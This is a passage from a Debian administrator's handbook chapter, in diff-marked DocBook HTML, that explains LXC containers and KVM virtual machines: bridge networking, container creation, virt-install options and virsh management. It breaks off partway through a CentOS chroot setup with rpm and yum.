+				Even though it is used to build “virtual machines”, LXC is not, strictly speaking, a virtualization system, but a system to isolate groups of processes from each other even though they all run on the same host. It takes advantage of a set of recent evolutions in the Linux kernel, collectively known as <span
+              class="emphasis"><em>control groups</em></span>, by which different sets of processes called “groups” have different views of certain aspects of the overall system. Most notable among these aspects are the process identifiers, the network configuration, and the mount points. Such a group of isolated processes will not have any access to the other processes in the system, and its accesses to the filesystem can be restricted to a specific subset. It can also have its own network interface and routing table, and it may be configured to only see a subset of the available devices present on the system.
+			</div><div
+            class="para">
+				These features can be combined to isolate a whole process family starting from the <code
+              class="command">init</code> process, and the resulting set looks very much like a virtual machine. The official name for such a setup is a “container” (hence the LXC moniker: <span
+              class="emphasis"><em>LinuX Containers</em></span>), but a rather important difference with “real” virtual machines such as provided by Xen or KVM is that there's no second kernel; the container uses the very same kernel as the host system. This has both pros and cons: advantages include excellent performance due to the total lack of overhead, and the fact that the kernel has a global vision of all the processes running on the system, so the scheduling can be more efficient than it would be if two independent kernels were to schedule different task sets. Chief among the inconveniences is the impossibility to run a different kernel in a container (whether a different Linux version or a different operating system altogether).
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> LXC isolation limits</strong></p></div></div></div><div
+              class="para">
+				LXC containers do not provide the level of isolation achieved by heavier emulators or virtualizers. In particular:
+			</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+						since the kernel is shared among the host system and the containers, processes constrained to containers can still access the kernel messages, which can lead to information leaks if messages are emitted by a container;
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						for similar reasons, if a container is compromised and a kernel vulnerability is exploited, the other containers may be affected too;
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						on the filesystem, the kernel checks permissions according to the numerical identifiers for users and groups; these identifiers may designate different users and groups depending on the container, which should be kept in mind if writable parts of the filesystem are shared among containers.
+					</div></li></ul></div></div><div
+            class="para">
+				Since we are dealing with isolation and not plain virtualization, setting up LXC containers is more complex than just running debian-installer on a virtual machine. We will describe a few prerequisites, then go on to the network configuration; we will then be able to actually create the system to be run in the container.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.5.13.7"></a>12.2.2.1. Preliminary Steps</h4></div></div></div><div
+              class="para">
+					The <span
+                class="pkg pkg">lxc</span> package contains the tools required to run LXC, and must therefore be installed.
+				</div><div
+              class="para">
+					LXC also requires the <span
+                class="emphasis"><em>control groups</em></span> configuration system, which is a virtual filesystem to be mounted on <code
+                class="filename">/sys/fs/cgroup</code>. Since Debian 8 switched to systemd, which also relies on control groups, this is now done automatically at boot time without further configuration.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.lxc.network"></a>12.2.2.2. Network Configuration</h4></div></div></div><div
+              class="para">
+					The goal of installing LXC is to set up virtual machines; while we could of course keep them isolated from the network, and only communicate with them via the filesystem, most use cases involve giving at least minimal network access to the containers. In the typical case, each container will get a virtual network interface, connected to the real network through a bridge. This virtual interface can be plugged either directly onto the host's physical network interface (in which case the container is directly on the network), or onto another virtual interface defined on the host (and the host can then filter or route traffic). In both cases, the <span
+                class="pkg pkg">bridge-utils</span> package will be required.
+				</div><div
+              class="para">
+					The simple case is just a matter of editing <code
+                class="filename">/etc/network/interfaces</code>, moving the configuration for the physical interface (for instance <code
+                class="literal">eth0</code>) to a bridge interface (usually <code
+                class="literal">br0</code>), and configuring the link between them. For instance, if the network interface configuration file initially contains entries such as the following:
+				</div><pre
+              class="programlisting">auto eth0
+iface eth0 inet dhcp</pre><div
+              class="para">
+					They should be disabled and replaced with the following:
+				</div><pre
+              class="programlisting">#auto eth0
+#iface eth0 inet dhcp
+
+auto br0
+iface br0 inet dhcp
+  bridge-ports eth0</pre><div
+              class="para">
+					The effect of this configuration will be similar to what would be obtained if the containers were machines plugged into the same physical network as the host. The “bridge” configuration manages the transit of Ethernet frames between all the bridged interfaces, which includes the physical <code
+                class="literal">eth0</code> as well as the interfaces defined for the containers.
+				</div><div
+              class="para">
+					In cases where this configuration cannot be used (for instance if no public IP addresses can be assigned to the containers), a virtual <span
+                class="emphasis"><em>tap</em></span> interface will be created and connected to the bridge. The equivalent network topology then becomes that of a host with a second network card plugged into a separate switch, with the containers also plugged into that switch. The host must then act as a gateway for the containers if they are meant to communicate with the outside world.
+				</div><div
+              class="para">
+					In addition to <span
+                class="pkg pkg">bridge-utils</span>, this “rich” configuration requires the <span
+                class="pkg pkg">vde2</span> package; the <code
+                class="filename">/etc/network/interfaces</code> file then becomes:
+				</div><pre
+              class="programlisting"># Interface eth0 is unchanged
+auto eth0
+iface eth0 inet dhcp
+
+# Virtual interface 
+auto tap0
+iface tap0 inet manual
+  vde2-switch -t tap0
+
+# Bridge for containers
+auto br0
+iface br0 inet static
+  bridge-ports tap0
+  address 10.0.0.1
+  netmask 255.255.255.0
+</pre><div
+              class="para">
+					The network can then be set up either statically in the containers, or dynamically with DHCP server running on the host. Such a DHCP server will need to be configured to answer queries on the <code
+                class="literal">br0</code> interface.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.5.13.9"></a>12.2.2.3. Setting Up the System</h4></div></div></div><div
+              class="para">
+					Let us now set up the filesystem to be used by the container. Since this “virtual machine” will not run directly on the hardware, some tweaks are required when compared to a standard filesystem, especially as far as the kernel, devices and consoles are concerned. Fortunately, the <span
+                class="pkg pkg">lxc</span> includes scripts that mostly automate this configuration. For instance, the following commands (which require the <span
+                class="pkg pkg">debootstrap</span> and <span
+                class="pkg pkg">rsync</span> packages) will install a Debian container:
+				</div><pre
+              class="screen"><code
+                class="computeroutput">root@mirwiz:~# </code><strong
+                class="userinput"><code>lxc-create -n testlxc -t debian
+</code></strong><code
+                class="computeroutput">debootstrap is /usr/sbin/debootstrap
+Checking cache download in /var/cache/lxc/debian/rootfs-jessie-amd64 ... 
+Downloading debian minimal ...
+I: Retrieving Release 
+I: Retrieving Release.gpg 
+[...]
+Download complete.
+Copying rootfs to /var/lib/lxc/testlxc/rootfs...
+[...]
+Root password is 'sSiKhMzI', please change !
+root@mirwiz:~# </code>
+</pre><div
+              class="para">
+					Note that the filesystem is initially created in <code
+                class="filename">/var/cache/lxc</code>, then moved to its destination directory. This allows creating identical containers much more quickly, since only copying is then required.
+				</div><div
+              class="para">
+					Note that the debian template creation script accepts an <code
+                class="option">--arch</code> option to specify the architecture of the system to be installed and a <code
+                class="option">--release</code> option if you want to install something else than the current stable release of Debian. You can also set the <code
+                class="literal">MIRROR</code> environment variable to point to a local Debian mirror.
+				</div><div
+              class="para">
+					The newly-created filesystem now contains a minimal Debian system, and by default the container has no network interface (besides the loopback one). Since this is not really wanted, we will edit the container's configuration file (<code
+                class="filename">/var/lib/lxc/testlxc/config</code>) and add a few <code
+                class="literal">lxc.network.*</code> entries:
+				</div><pre
+              class="programlisting">lxc.network.type = veth
+lxc.network.flags = up
+lxc.network.link = br0
+lxc.network.hwaddr = 4a:49:43:49:79:20
+</pre><div
+              class="para">
+					These entries mean, respectively, that a virtual interface will be created in the container; that it will automatically be brought up when said container is started; that it will automatically be connected to the <code
+                class="literal">br0</code> bridge on the host; and that its MAC address will be as specified. Should this last entry be missing or disabled, a random MAC address will be generated.
+				</div><div
+              class="para">
+					Another useful entry in that file is the setting of the hostname:
+				</div><pre
+              class="programlisting">lxc.utsname = testlxc
+</pre></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.5.13.10"></a>12.2.2.4. Starting the Container</h4></div></div></div><div
+              class="para">
+					Now that our virtual machine image is ready, let's start the container:
+				</div><pre
+              class="screen scale"
+              width="94"><code
+                class="computeroutput">root@mirwiz:~# </code><strong
+                class="userinput"><code>lxc-start --daemon --name=testlxc
+</code></strong><code
+                class="computeroutput">root@mirwiz:~# </code><strong
+                class="userinput"><code>lxc-console -n testlxc
+</code></strong><code
+                class="computeroutput">Debian GNU/Linux 8 testlxc tty1
+
+testlxc login: </code><strong
+                class="userinput"><code>root</code></strong><code
+                class="computeroutput">
+Password: 
+Linux testlxc 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt11-1 (2015-05-24) x86_64
+
+The programs included with the Debian GNU/Linux system are free software;
+the exact distribution terms for each program are described in the
+individual files in /usr/share/doc/*/copyright.
+
+Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
+permitted by applicable law.
+root@testlxc:~# </code><strong
+                class="userinput"><code>ps auxwf</code></strong>
+<code
+                class="computeroutput">USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
+root         1  0.0  0.2  28164  4432 ?        Ss   17:33   0:00 /sbin/init
+root        20  0.0  0.1  32960  3160 ?        Ss   17:33   0:00 /lib/systemd/systemd-journald
+root        82  0.0  0.3  55164  5456 ?        Ss   17:34   0:00 /usr/sbin/sshd -D
+root        87  0.0  0.1  12656  1924 tty2     Ss+  17:34   0:00 /sbin/agetty --noclear tty2 linux
+root        88  0.0  0.1  12656  1764 tty3     Ss+  17:34   0:00 /sbin/agetty --noclear tty3 linux
+root        89  0.0  0.1  12656  1908 tty4     Ss+  17:34   0:00 /sbin/agetty --noclear tty4 linux
+root        90  0.0  0.1  63300  2944 tty1     Ss   17:34   0:00 /bin/login --     
+root       117  0.0  0.2  21828  3668 tty1     S    17:35   0:00  \_ -bash
+root       268  0.0  0.1  19088  2572 tty1     R+   17:39   0:00      \_ ps auxfw
+root        91  0.0  0.1  14228  2356 console  Ss+  17:34   0:00 /sbin/agetty --noclear --keep-baud console 115200 38400 9600 vt102
+root       197  0.0  0.4  25384  7640 ?        Ss   17:38   0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.e
+root       266  0.0  0.1  12656  1840 ?        Ss   17:39   0:00 /sbin/agetty --noclear tty5 linux
+root       267  0.0  0.1  12656  1928 ?        Ss   17:39   0:00 /sbin/agetty --noclear tty6 linux
+root@testlxc:~# </code></pre><div
+              class="para">
+					We are now in the container; our access to the processes is restricted to only those started from the container itself, and our access to the filesystem is similarly restricted to the dedicated subset of the full filesystem (<code
+                class="filename">/var/lib/lxc/testlxc/rootfs</code>). We can exit the console with <span
+                class="keycap"><strong>Control</strong></span>+<span
+                class="keycap"><strong>a</strong></span> <span
+                class="keycap"><strong>q</strong></span>.
+				</div><div
+              class="para">
+					Note that we ran the container as a background process, thanks to the <code
+                class="option">--daemon</code> option of <code
+                class="command">lxc-start</code>. We can interrupt the container with a command such as <code
+                class="command">lxc-stop --name=testlxc</code>.
+				</div><div
+              class="para">
+					The <span
+                class="pkg pkg">lxc</span> package contains an initialization script that can automatically start one or several containers when the host boots (it relies on <code
+                class="command">lxc-autostart</code> which starts containers whose <code
+                class="literal">lxc.start.auto</code> option is set to 1). Finer-grained control of the startup order is possible with <code
+                class="literal">lxc.start.order</code> and <code
+                class="literal">lxc.group</code>: by default, the initialization script first starts containers which are part of the <code
+                class="literal">onboot</code> group and then the containers which are not part of any group. In both cases, the order within a group is defined by the <code
+                class="literal">lxc.start.order</code> option.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>GOING FURTHER</em></span> Mass virtualization</strong></p></div></div></div><div
+                class="para">
+					Since LXC is a very lightweight isolation system, it can be particularly adapted to massive hosting of virtual servers. The network configuration will probably be a bit more advanced than what we described above, but the “rich” configuration using <code
+                  class="literal">tap</code> and <code
+                  class="literal">veth</code> interfaces should be enough in many cases.
+				</div><div
+                class="para">
+					It may also make sense to share part of the filesystem, such as the <code
+                  class="filename">/usr</code> and <code
+                  class="filename">/lib</code> subtrees, so as to avoid duplicating the software that may need to be common to several containers. This will usually be achieved with <code
+                  class="literal">lxc.mount.entry</code> entries in the containers configuration file. An interesting side-effect is that the processes will then use less physical memory, since the kernel is able to detect that the programs are shared. The marginal cost of one extra container can then be reduced to the disk space dedicated to its specific data, and a few extra processes that the kernel must schedule and manage.
+				</div><div
+                class="para">
+					We haven't described all the available options, of course; more comprehensive information can be obtained from the <span
+                  class="citerefentry"><span
+                    class="refentrytitle">lxc</span>(7)</span> and <span
+                  class="citerefentry"><span
+                    class="refentrytitle">lxc.container.conf</span>(5)</span> manual pages and the ones they reference.
+				</div></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.15.5.14"></a>12.2.3. Virtualization with KVM</h3></div></div></div><a
+            id="id-1.15.5.14.2"
+            class="indexterm"></a><div
+            class="para">
+				KVM, which stands for <span
+              class="emphasis"><em>Kernel-based Virtual Machine</em></span>, is first and foremost a kernel module providing most of the infrastructure that can be used by a virtualizer, but it is not a virtualizer by itself. Actual control for the virtualization is handled by a QEMU-based application. Don't worry if this section mentions <code
+              class="command">qemu-*</code> commands: it is still about KVM.
+			</div><div
+            class="para">
+				Unlike other virtualization systems, KVM was merged into the Linux kernel right from the start. Its developers chose to take advantage of the processor instruction sets dedicated to virtualization (Intel-VT and AMD-V), which keeps KVM lightweight, elegant and not resource-hungry. The counterpart, of course, is that KVM doesn't work on any computer but only on those with appropriate processors. For x86-based computers, you can verify that you have such a processor by looking for “vmx” or “svm” in the CPU flags listed in <code
+              class="filename">/proc/cpuinfo</code>.
+			</div><div
+            class="para">
+				With Red Hat actively supporting its development, KVM has more or less become the reference for Linux virtualization.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.5.14.6"></a>12.2.3.1. Preliminary Steps</h4></div></div></div><a
+              id="id-1.15.5.14.6.2"
+              class="indexterm"></a><div
+              class="para">
+					Unlike such tools as VirtualBox, KVM itself doesn't include any user-interface for creating and managing virtual machines. The <span
+                class="pkg pkg">qemu-kvm</span> package only provides an executable able to start a virtual machine, as well as an initialization script that loads the appropriate kernel modules.
+				</div><a
+              id="id-1.15.5.14.6.4"
+              class="indexterm"></a><a
+              id="id-1.15.5.14.6.5"
+              class="indexterm"></a><div
+              class="para">
+					Fortunately, Red Hat also provides another set of tools to address that problem, by developing the <span
+                class="emphasis"><em>libvirt</em></span> library and the associated <span
+                class="emphasis"><em>virtual machine manager</em></span> tools. libvirt allows managing virtual machines in a uniform way, independently of the virtualization system involved behind the scenes (it currently supports QEMU, KVM, Xen, LXC, OpenVZ, VirtualBox, VMWare and UML). <code
+                class="command">virtual-manager</code> is a graphical interface that uses libvirt to create and manage virtual machines.
+				</div><a
+              id="id-1.15.5.14.6.7"
+              class="indexterm"></a><div
+              class="para">
+					We first install the required packages, with <code
+                class="command">apt-get install qemu-kvm libvirt-bin virtinst virt-manager virt-viewer</code>. <span
+                class="pkg pkg">libvirt-bin</span> provides the <code
+                class="command">libvirtd</code> daemon, which allows (potentially remote) management of the virtual machines running of the host, and starts the required VMs when the host boots. In addition, this package provides the <code
+                class="command">virsh</code> command-line tool, which allows controlling the <code
+                class="command">libvirtd</code>-managed machines.
+				</div><div
+              class="para">
+					The <span
+                class="pkg pkg">virtinst</span> package provides <code
+                class="command">virt-install</code>, which allows creating virtual machines from the command line. Finally, <span
+                class="pkg pkg">virt-viewer</span> allows accessing a VM's graphical console.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.5.14.7"></a>12.2.3.2. Network Configuration</h4></div></div></div><div
+              class="para">
+					Just as in Xen and LXC, the most frequent network configuration involves a bridge grouping the network interfaces of the virtual machines (see <a
+                class="xref"
+                href="sect.virtualization.html#sect.lxc.network">12.2.2.2 – „Network Configuration“</a>).
+				</div><div
+              class="para">
+					Alternatively, and in the default configuration provided by KVM, the virtual machine is assigned a private address (in the 192.168.122.0/24 range), and NAT is set up so that the VM can access the outside network.
+				</div><div
+              class="para">
+					The rest of this section assumes that the host has an <code
+                class="literal">eth0</code> physical interface and a <code
+                class="literal">br0</code> bridge, and that the former is connected to the latter.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.5.14.8"></a>12.2.3.3. Installation with <code
+                      class="command">virt-install</code></h4></div></div></div><a
+              id="id-1.15.5.14.8.2"
+              class="indexterm"></a><div
+              class="para">
+					Creating a virtual machine is very similar to installing a normal system, except that the virtual machine's characteristics are described in a seemingly endless command line.
+				</div><div
+              class="para">
+					Practically speaking, this means we will use the Debian installer, by booting the virtual machine on a virtual DVD-ROM drive that maps to a Debian DVD image stored on the host system. The VM will export its graphical console over the VNC protocol (see <a
+                class="xref"
+                href="sect.remote-login.html#sect.remote-desktops">9.2.2 – „Using Remote Graphical Desktops“</a> for details), which will allow us to control the installation process.
+				</div><div
+              class="para">
+					We first need to tell libvirtd where to store the disk images, unless the default location (<code
+                class="filename">/var/lib/libvirt/images/</code>) is fine.
+				</div><pre
+              class="screen"><code
+                class="computeroutput">root@mirwiz:~# </code><strong
+                class="userinput"><code>mkdir /srv/kvm</code></strong>
+<code
+                class="computeroutput">root@mirwiz:~# </code><strong
+                class="userinput"><code>virsh pool-create-as srv-kvm dir --target /srv/kvm</code></strong>
+<code
+                class="computeroutput">Pool srv-kvm created
+
+root@mirwiz:~# </code></pre><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TIP</em></span> Add your user to the libvirt group</strong></p></div></div></div><div
+                class="para">
+					All samples in this section assume that you are running commands as root. Effectively, if you want to control a local libvirt daemon, you need either to be root or to be a member of the <code
+                  class="literal">libvirt</code> group (which is not the case by default). Thus if you want to avoid using root rights too often, you can add yoursel to the <code
+                  class="literal">libvirt</code> group and run the various commands under your user identity.
+				</div></div><div
+              class="para">
+					Let us now start the installation process for the virtual machine, and have a closer look at <code
+                class="command">virt-install</code>'s most important options. This command registers the virtual machine and its parameters in libvirtd, then starts it so that its installation can proceed.
+				</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>virt-install --connect qemu:///system  <span
+                    id="virtinst.connect"><img
+                      class="callout"
+                      src="Common_Content/images/1.png"
+                      alt="1" /></span>
+               --virt-type kvm           <span
+                    id="virtinst.type"><img
+                      class="callout"
+                      src="Common_Content/images/2.png"
+                      alt="2" /></span>
+               --name testkvm            <span
+                    id="virtinst.name"><img
+                      class="callout"
+                      src="Common_Content/images/3.png"
+                      alt="3" /></span>
+               --ram 1024                <span
+                    id="virtinst.ram"><img
+                      class="callout"
+                      src="Common_Content/images/4.png"
+                      alt="4" /></span>
+               --disk /srv/kvm/testkvm.qcow,format=qcow2,size=10 <span
+                    id="virtinst.disk"><img
+                      class="callout"
+                      src="Common_Content/images/5.png"
+                      alt="5" /></span>
+               --cdrom /srv/isos/debian-8.1.0-amd64-netinst.iso  <span
+                    id="virtinst.cdrom"><img
+                      class="callout"
+                      src="Common_Content/images/6.png"
+                      alt="6" /></span>
+               --network bridge=br0      <span
+                    id="virtinst.network"><img
+                      class="callout"
+                      src="Common_Content/images/7.png"
+                      alt="7" /></span>
+               --vnc                     <span
+                    id="virtinst.vnc"><img
+                      class="callout"
+                      src="Common_Content/images/8.png"
+                      alt="8" /></span>
+               --os-type linux           <span
+                    id="virtinst.os"><img
+                      class="callout"
+                      src="Common_Content/images/9.png"
+                      alt="9" /></span>
+               --os-variant debianwheezy
+</code></strong><code
+                class="computeroutput">
+Starting install...
+Allocating 'testkvm.qcow'             |  10 GB     00:00
+Creating domain...                    |    0 B     00:00
+Guest installation complete... restarting guest.
+</code></pre><div
+              class="calloutlist"><table
+                border="0"
+                summary="Callout list"><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#virtinst.connect"><img
+                          class="callout"
+                          src="Common_Content/images/1.png"
+                          alt="1" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							The <code
+                        class="literal">--connect</code> option specifies the “hypervisor” to use. Its form is that of an URL containing a virtualization system (<code
+                        class="literal">xen://</code>, <code
+                        class="literal">qemu://</code>, <code
+                        class="literal">lxc://</code>, <code
+                        class="literal">openvz://</code>, <code
+                        class="literal">vbox://</code>, and so on) and the machine that should host the VM (this can be left empty in the case of the local host). In addition to that, and in the QEMU/KVM case, each user can manage virtual machines working with restricted permissions, and the URL path allows differentiating “system” machines (<code
+                        class="literal">/system</code>) from others (<code
+                        class="literal">/session</code>).
+						</div></td></tr><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#virtinst.type"><img
+                          class="callout"
+                          src="Common_Content/images/2.png"
+                          alt="2" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							Since KVM is managed the same way as QEMU, the <code
+                        class="literal">--virt-type kvm</code> allows specifying the use of KVM even though the URL looks like QEMU.
+						</div></td></tr><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#virtinst.name"><img
+                          class="callout"
+                          src="Common_Content/images/3.png"
+                          alt="3" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							The <code
+                        class="literal">--name</code> option defines a (unique) name for the virtual machine.
+						</div></td></tr><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#virtinst.ram"><img
+                          class="callout"
+                          src="Common_Content/images/4.png"
+                          alt="4" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							The <code
+                        class="literal">--ram</code> option allows specifying the amount of RAM (in MB) to allocate for the virtual machine.
+						</div></td></tr><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#virtinst.disk"><img
+                          class="callout"
+                          src="Common_Content/images/5.png"
+                          alt="5" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							The <code
+                        class="literal">--disk</code> specifies the location of the image file that is to represent our virtual machine's hard disk; that file is created, unless present, with a size (in GB) specified by the <code
+                        class="literal">size</code> parameter. The <code
+                        class="literal">format</code> parameter allows choosing among several ways of storing the image file. The default format (<code
+                        class="literal">raw</code>) is a single file exactly matching the disk's size and contents. We picked a more advanced format here, that is specific to QEMU and allows starting with a small file that only grows when the virtual machine starts actually using space.
+						</div></td></tr><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#virtinst.cdrom"><img
+                          class="callout"
+                          src="Common_Content/images/6.png"
+                          alt="6" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							The <code
+                        class="literal">--cdrom</code> option is used to indicate where to find the optical disk to use for installation. The path can be either a local path for an ISO file, an URL where the file can be obtained, or the device file of a physical CD-ROM drive (i.e. <code
+                        class="literal">/dev/cdrom</code>).
+						</div></td></tr><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#virtinst.network"><img
+                          class="callout"
+                          src="Common_Content/images/7.png"
+                          alt="7" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							The <code
+                        class="literal">--network</code> specifies how the virtual network card integrates in the host's network configuration. The default behavior (which we explicitly forced in our example) is to integrate it into any pre-existing network bridge. If no such bridge exists, the virtual machine will only reach the physical network through NAT, so it gets an address in a private subnet range (192.168.122.0/24).
+						</div></td></tr><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#virtinst.vnc"><img
+                          class="callout"
+                          src="Common_Content/images/8.png"
+                          alt="8" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							<code
+                        class="literal">--vnc</code> states that the graphical console should be made available using VNC. The default behavior for the associated VNC server is to only listen on the local interface; if the VNC client is to be run on a different host, establishing the connection will require setting up an SSH tunnel (see <a
+                        class="xref"
+                        href="sect.remote-login.html#sect.ssh-port-forwarding">9.2.1.3 – „Creating Encrypted Tunnels with Port Forwarding“</a>). Alternatively, the <code
+                        class="literal">--vnclisten=0.0.0.0</code> can be used so that the VNC server is accessible from all interfaces; note that if you do that, you really should design your firewall accordingly.
+						</div></td></tr><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#virtinst.os"><img
+                          class="callout"
+                          src="Common_Content/images/9.png"
+                          alt="9" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							The <code
+                        class="literal">--os-type</code> and <code
+                        class="literal">--os-variant</code> options allow optimizing a few parameters of the virtual machine, based on some of the known features of the operating system mentioned there.
+						</div></td></tr></table></div><div
+              class="para">
+					At this point, the virtual machine is running, and we need to connect to the graphical console to proceed with the installation process. If the previous operation was run from a graphical desktop environment, this connection should be automatically started. If not, or if we operate remotely, <code
+                class="command">virt-viewer</code> can be run from any graphical environment to open the graphical console (note that the root password of the remote host is asked twice because the operation requires 2 SSH connections):
+				</div><pre
+              class="screen"><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>virt-viewer --connect qemu+ssh://root@<em
+                    class="replaceable">server</em>/system testkvm
+</code></strong><code
+                class="computeroutput">root@server's password: 
+root@server's password: </code></pre><div
+              class="para">
+					When the installation process ends, the virtual machine is restarted, now ready for use.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.5.14.9"></a>12.2.3.4. Managing Machines with <code
+                      class="command">virsh</code></h4></div></div></div><a
+              id="id-1.15.5.14.9.2"
+              class="indexterm"></a><div
+              class="para">
+					Now that the installation is done, let us see how to handle the available virtual machines. The first thing to try is to ask <code
+                class="command">libvirtd</code> for the list of the virtual machines it manages:
+				</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>virsh -c qemu:///system list --all
+ Id Name                 State
+----------------------------------
+  - testkvm              shut off
+</code></strong></pre><div
+              class="para">
+					Let's start our test virtual machine:
+				</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>virsh -c qemu:///system start testkvm
+</code></strong><code
+                class="computeroutput">Domain testkvm started</code></pre><div
+              class="para">
+					We can now get the connection instructions for the graphical console (the returned VNC display can be given as parameter to <code
+                class="command">vncviewer</code>):
+				</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>virsh -c qemu:///system vncdisplay testkvm
+</code></strong><code
+                class="computeroutput">:0</code></pre><div
+              class="para">
+					Other available <code
+                class="command">virsh</code> subcommands include:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="literal">reboot</code> to restart a virtual machine;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="literal">shutdown</code> to trigger a clean shutdown;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="literal">destroy</code>, to stop it brutally;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="literal">suspend</code> to pause it;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="literal">resume</code> to unpause it;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="literal">autostart</code> to enable (or disable, with the <code
+                      class="literal">--disable</code> option) starting the virtual machine automatically when the host starts;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="literal">undefine</code> to remove all traces of the virtual machine from <code
+                      class="command">libvirtd</code>.
+						</div></li></ul></div><div
+              class="para">
+					All these subcommands take a virtual machine identifier as a parameter.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.5.14.10"></a>12.2.3.5. Installing an RPM based system in Debian with yum</h4></div></div></div><div
+              class="para">
+					If the virtual machine is meant to run a Debian (or one of its derivatives), the system can be initialized with <code
+                class="command">debootstrap</code>, as described above. But if the virtual machine is to be installed with an RPM-based system (such as Fedora, CentOS or Scientific Linux), the setup will need to be done using the <code
+                class="command">yum</code> utility (available in the package of the same name).
+				</div><div
+              class="para">
+					The procedure requires using <code
+                class="command">rpm</code> to extract an initial set of files, including notably <code
+                class="command">yum</code> configuration files, and then calling <code
+                class="command">yum</code> to extract the remaining set of packages. But since we call <code
+                class="command">yum</code> from outside the chroot, we need to make some temporary changes. In the sample below, the target chroot is <code
+                class="filename">/srv/centos</code>.
+				</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>rootdir="/srv/centos"
+</code></strong><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>mkdir -p "$rootdir" /etc/rpm
+</code></strong><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>echo "%_dbpath /var/lib/rpm" &gt; /etc/rpm/macros.dbpath
+</code></strong><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>wget http://mirror.centos.org/centos/7/os/x86_64/Packages/centos-release-7-1.1503.el7.centos.2.8.x86_64.rpm
+</code></strong><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>rpm --nodeps --root "$rootdir" -i centos-release-7-1.1503.el7.centos.2.8.x86_64.rpm
+</code></strong><code
+                class="computeroutput">rpm: RPM should not be used directly install RPM packages, use Alien instead!
+rpm: However assuming you know what you are doing...
+warning: centos-release-7-1.1503.el7.centos.2.8.x86_64.rpm: Header V3 RSA/SHA256 Signature, key ID f4a80eb5: NOKEY
+# </code><strong
+                class="userinput"><code>sed -i -e "s,gpgkey=file:///etc/,gpgkey=file://${rootdir}/etc/,g" $rootdir/etc/yum.repos.d/*.repo
+</code></strong><code
+                class="computeroutput"># </code><strong
